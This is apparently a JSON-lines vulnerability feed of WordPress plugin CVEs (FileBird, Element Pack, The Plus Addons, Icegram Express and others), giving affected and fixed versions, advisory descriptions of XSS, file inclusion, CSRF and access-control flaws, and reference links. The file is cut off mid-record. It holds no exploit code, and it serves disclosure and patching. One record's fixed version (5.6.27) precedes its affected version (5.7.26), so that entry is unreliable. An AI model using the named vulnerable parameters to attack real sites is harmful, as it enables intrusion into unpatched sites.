{"CVE_ID":"CVE-2024-2345","slug":"filebird","versionImpact":"5.6.3","versionEndExcluding":"5.6.4","description":"The FileBird \u2013 WordPress Media Library Folders & File Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the folder name parameter in all versions up to, and including, 5.6.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/129cc3b0-4f48-4846-902e-be5cd339f537?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/129cc3b0-4f48-4846-902e-be5cd339f537?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3060898%40filebird%2Ftrunk&old=3049188%40filebird%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3060898%40filebird%2Ftrunk&old=3049188%40filebird%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3927","slug":"bdthemes-element-pack-lite","versionImpact":"5.6.3","versionEndExcluding":"5.6.4","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Form Submission Admin Email Bypass in all versions up to, and including, 5.6.3. This is due to the plugin not properly checking for all variations of an administrator's emails. This makes it possible for unauthenticated attackers to bypass the restriction using a +value when submitting the contact form.","recommendation":"Update to version 5.6.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a703fc4-6c61-442e-a637-515e9f501575?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3a703fc4-6c61-442e-a637-515e9f501575?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/contact-form\\\/module.php#L102\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/trunk\\\/modules\\\/contact-form\\\/module.php#L102\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089154\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3089154\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5583","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.6.2","versionEndExcluding":"5.6.3","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the carousel_direction parameter of testimonials widget in all versions up to, and including, 5.6.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55981e72-8d1a-4075-a372-6bddc95e99d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/55981e72-8d1a-4075-a372-6bddc95e99d8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.6\\\/modules\\\/widgets\\\/tp_testimonial_listout.php#L2284\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.6\\\/modules\\\/widgets\\\/tp_testimonial_listout.php#L2284\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5703","slug":"email-subscribers","versionImpact":"5.7.26","versionEndExcluding":"5.6.27","description":"The Email Subscribers by Icegram Express \u2013 Email Marketing, Newsletters, Automation for WordPress & WooCommerce plugin for WordPress is vulnerable to unauthorized API access due to a missing capability check in all versions up to, and including, 5.7.26. This makes it possible for authenticated attackers, with Subscriber-level access and above, to access the API (provided it is enabled) and add, edit, and delete audience users.","recommendation":"Update to version 5.6.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22283650-36bf-43e5-a57e-a91025fb2af7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/22283650-36bf-43e5-a57e-a91025fb2af7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-es-rest-api-admin.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-es-rest-api-admin.php#L25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3118326\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-es-rest-api-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3118326\\\/email-subscribers\\\/trunk\\\/lite\\\/admin\\\/class-es-rest-api-admin.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5414","slug":"email-subscribers","versionImpact":"5.6.23","versionEndExcluding":"5.6.24","description":"The Icegram Express plugin for WordPress is vulnerable to Directory Traversal in versions up to, and including, 5.6.23 via the show_es_logs function. This allows administrator-level attackers to read the contents of arbitrary files on the server, which can contain sensitive information including those belonging to other sites, for example in shared hosting environments.","recommendation":"Update to version 5.6.24, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/417186ba-36ef-4d06-bbcd-e85eb9219689?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/417186ba-36ef-4d06-bbcd-e85eb9219689?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/classes\\\/class-email-subscribers-logs.php?rev=2919465#L28\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/email-subscribers\\\/trunk\\\/lite\\\/includes\\\/classes\\\/class-email-subscribers-logs.php?rev=2919465#L28\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977318%40email-subscribers%2Ftrunk&old=2972043%40email-subscribers%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2977318%40email-subscribers%2Ftrunk&old=2972043%40email-subscribers%2Ftrunk&sfp_email=&sfph_mail=#file4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-44589","slug":"miniorange-2-factor-authentication","versionEndExcluding":"5.6.2","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in miniOrange miniOrange's Google Authenticator \u2013 WordPress Two Factor Authentication \u2013 2FA , Two Factor, OTP SMS and Email | Passwordless login. This issue affects miniOrange's Google Authenticator \u2013 WordPress Two Factor Authentication \u2013 2FA , Two Factor, OTP SMS and Email | Passwordless login: from n\/a through 5.6.1.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/miniorange-2-factor-authentication\\\/wordpress-miniorange-two-factor-authentication-plugin-5-6-1-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/miniorange-2-factor-authentication\\\/wordpress-miniorange-two-factor-authentication-plugin-5-6-1-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3926","slug":"bdthemes-element-pack-lite","versionImpact":"5.6.1","versionEndExcluding":"5.6.2","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the custom_attributes value in widgets in all versions up to, and including, 5.6.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f931cf8e-01dd-4f0b-ac86-6e0654fd1597?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f931cf8e-01dd-4f0b-ac86-6e0654fd1597?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/tags\\\/5.6.0\\\/modules\\\/creative-button\\\/widgets\\\/creative-button.php#L648\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/tags\\\/5.6.0\\\/modules\\\/creative-button\\\/widgets\\\/creative-button.php#L648\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3066178\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3066178\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-28121","slug":"woocommerce-payments","versionEndExcluding":"5.6.2","description":"An issue in WooCommerce Payments plugin for WordPress (versions 5.6.1 and lower) allows an unauthenticated attacker to send requests on behalf of an elevated user, like administrator. This allows a remote, unauthenticated attacker to gain admin access on a site that has the affected version of the plugin activated.","refs":"[{\"url\":\"https:\\\/\\\/developer.woocommerce.com\\\/2023\\\/03\\\/23\\\/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know\\\/\",\"name\":\"https:\\\/\\\/developer.woocommerce.com\\\/2023\\\/03\\\/23\\\/critical-vulnerability-detected-in-woocommerce-payments-what-you-need-to-know\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4482","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.6.1","versionEndExcluding":"5.6.2","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Countdown' widget in all versions up to, and including, 5.6.1 due to insufficient input sanitization and output escaping on user supplied 'text_days' attribute. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25e42bf8-794e-46a5-b7db-f1f8802bba00?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25e42bf8-794e-46a5-b7db-f1f8802bba00?source=cve\",\"refsource\":\"\",\"tags\":[\"Third Party Advisory\"]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.1\\\/modules\\\/widgets\\\/tp_countdown.php#L1945\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.1\\\/modules\\\/widgets\\\/tp_countdown.php#L1945\",\"refsource\":\"\",\"tags\":[\"Product\"]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-elementor-page-builder\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/the-plus-addons-for-elementor-page-builder\\\/#developers\",\"refsource\":\"\",\"tags\":[\"Release Notes\"]}]"}
{"CVE_ID":"CVE-2024-12633","slug":"joomsport-sports-league-results-management","versionImpact":"5.6.17","versionEndExcluding":"5.6.18","description":"The JoomSport \u2013 for Sports: Team & League, Football, Hockey & more plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018page\u2019 parameter in all versions up to, and including, 5.6.17 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.6.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209054\\\/joomsport-sports-league-results-management\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3209054\\\/joomsport-sports-league-results-management\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4503e2c-0d0d-45de-a597-baace44a98a7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b4503e2c-0d0d-45de-a597-baace44a98a7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5554","slug":"bdthemes-element-pack-lite","versionImpact":"5.6.11","versionEndExcluding":"5.6.12","description":"The Element Pack Elementor Addons (Header Footer, Template Library, Dynamic Grid & Carousel, Remote Arrows) plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018onclick_event\u2019 parameter in all versions up to, and including, 5.6.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.6.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/696c379a-c5a4-489f-8363-8aea9a4da814?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/696c379a-c5a4-489f-8363-8aea9a4da814?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/tags\\\/5.6.4\\\/modules\\\/step-flow\\\/widgets\\\/step-flow.php#L2287\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bdthemes-element-pack-lite\\\/tags\\\/5.6.4\\\/modules\\\/step-flow\\\/widgets\\\/step-flow.php#L2287\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110404\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3110404\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8913","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.6.11","versionEndExcluding":"5.6.12","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 5.6.11 via the render function in modules\/widgets\/tp_accordion.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft template data.","recommendation":"Update to version 5.6.12, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46126f88-416a-4430-8596-12f72cd2c1e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/46126f88-416a-4430-8596-12f72cd2c1e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165763\\\/the-plus-addons-for-elementor-page-builder\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3165763\\\/the-plus-addons-for-elementor-page-builder\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5551","slug":"wp-staging-pro","versionImpact":"5.6.0","versionEndExcluding":"5.6.1","description":"The WP STAGING Pro WordPress Backup Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.6.0. This is due to missing or incorrect nonce validation on the 'sub' parameter called from the WP STAGING WordPress Backup Plugin - Backup Duplicator & Migration plugin. This makes it possible for unauthenticated attackers to include any local files that end in '-settings.php' via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 5.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a99a21c-d4f1-4cdb-b1f1-31b3cf666b80?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2a99a21c-d4f1-4cdb-b1f1-31b3cf666b80?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-staging\\\/trunk\\\/Backend\\\/views\\\/settings\\\/tabs\\\/remote-storages.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-staging\\\/trunk\\\/Backend\\\/views\\\/settings\\\/tabs\\\/remote-storages.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wp-staging.com\\\/\",\"name\":\"https:\\\/\\\/wp-staging.com\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4983","slug":"the-plus-addons-for-elementor-page-builder","versionImpact":"5.6.0","versionEndExcluding":"5.6.1","description":"The The Plus Addons for Elementor \u2013 Elementor Addons, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018video_color\u2019 parameter in all versions up to, and including, 5.6.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3f0a20b-d572-4040-b5b6-ede0aec4e2b0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3f0a20b-d572-4040-b5b6-ede0aec4e2b0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.3\\\/modules\\\/widgets\\\/tp_video_player.php#L1302\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/the-plus-addons-for-elementor-page-builder\\\/tags\\\/5.5.3\\\/modules\\\/widgets\\\/tp_video_player.php#L1302\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107776\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3107776\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0691","slug":"filebird","versionImpact":"5.6.0","versionEndExcluding":"5.6.1","description":"The FileBird plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported folder titles in all versions up to, and including, 5.5.8.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. It may also be possible to socially engineer an administrator into uploading a malicious folder import.","recommendation":"Update to version 5.6.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47f04985-dd9b-449f-8b4c-9811fe7e4a96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47f04985-dd9b-449f-8b4c-9811fe7e4a96?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023924\\\/filebird\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3023924\\\/filebird\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4466","slug":"ajax-load-more","versionEndExcluding":"5.6.0.3","description":"The WordPress Infinite Scroll WordPress plugin before 5.6.0.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/497d0bf9-b750-4293-9662-1722a74442e2\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/497d0bf9-b750-4293-9662-1722a74442e2\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5455","slug":"theplus_elementor_addon","versionImpact":"5.5.6","versionEndExcluding":"5.6.0","description":"The Plus Addons for Elementor Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 5.5.4 via the 'magazine_style' parameter within the Dynamic Smart Showcase widget. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"Update to version 5.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8699142d-4ddd-4ca1-9886-9b2d905a36cd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8699142d-4ddd-4ca1-9886-9b2d905a36cd?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/roadmap.theplusaddons.com\\\/updates\\\/\",\"name\":\"https:\\\/\\\/roadmap.theplusaddons.com\\\/updates\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5344","slug":"theplus_elementor_addon","versionImpact":"5.5.6","versionEndExcluding":"5.6.0","description":"The The Plus Addons for Elementor Page Builder plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the \u2018forgoturl\u2019 attribute within the plugin's WP Login & Register widget in all versions up to, and including, 5.5.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 5.6.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ac8fb0b-21a9-4b94-bb24-b349a7fe3305?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1ac8fb0b-21a9-4b94-bb24-b349a7fe3305?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/roadmap.theplusaddons.com\\\/updates\\\/\",\"name\":\"https:\\\/\\\/roadmap.theplusaddons.com\\\/updates\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6835","slug":"add-search-to-menu","versionImpact":"5.5.6","versionEndExcluding":"5.5.7","description":"The Ivory Search \u2013 WordPress Search Plugin plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 5.5.6 via the ajax_load_posts function. This makes it possible for unauthenticated attackers to extract text data from password-protected posts using the boolean-based attack on the AJAX search form","recommendation":"Update to version 5.5.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/013f7c26-8348-4c54-af61-473a720a5095?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/013f7c26-8348-4c54-af61-473a720a5095?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-search-to-menu\\\/tags\\\/5.5.6\\\/public\\\/class-is-ajax.php#L45\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-search-to-menu\\\/tags\\\/5.5.6\\\/public\\\/class-is-ajax.php#L45\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-search-to-menu\\\/tags\\\/5.5.6\\\/public\\\/partials\\\/is-ajax-results.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/add-search-to-menu\\\/tags\\\/5.5.6\\\/public\\\/partials\\\/is-ajax-results.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145289\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3145289\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3233","slug":"add-search-to-menu","versionImpact":"5.5.5","versionEndExcluding":"5.5.6","description":"The Ivory Search \u2013 WordPress Search Plugin plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_create_index() function in all versions up to, and including, 5.5.5. This makes it possible for authenticated attackers, with subscriber-level access and above, to trigger index creation.","recommendation":"Update to version 5.5.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc9935d8-7790-457b-88bf-bee5e13b0f5a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc9935d8-7790-457b-88bf-bee5e13b0f5a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3067568\\\/add-search-to-menu\\\/trunk\\\/includes\\\/class-is-index-manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3067568\\\/add-search-to-menu\\\/trunk\\\/includes\\\/class-is-index-manager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5341","slug":"theplus_elementor_addon","versionImpact":"5.5.4","versionEndExcluding":"5.5.5","description":"The The Plus Addons for Elementor Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'size' attribute of the Heading Title widget in all versions up to, and including, 5.5.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.5.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39c8e951-8e8c-4a72-9ecf-1dd96392105d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/39c8e951-8e8c-4a72-9ecf-1dd96392105d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/roadmap.theplusaddons.com\\\/updates\\\/\",\"name\":\"https:\\\/\\\/roadmap.theplusaddons.com\\\/updates\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3704","slug":"pta-volunteer-sign-up-sheets","versionImpact":"5.5.4","versionEndExcluding":"5.5.5","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in DBAR Productions Volunteer Sign Up Sheets allows Stored XSS.This issue affects Volunteer Sign Up Sheets: from n\/a before 5.5.5.\n\nThe patch is available exclusively on GitHub at  https:\/\/github.com\/dbarproductions\/pta-volunteer-sign-up-sheets , as the vendor encounters difficulties using SVN to deploy to the WordPress.org repository.","recommendation":"Update to version 5.5.5, or a newer patched 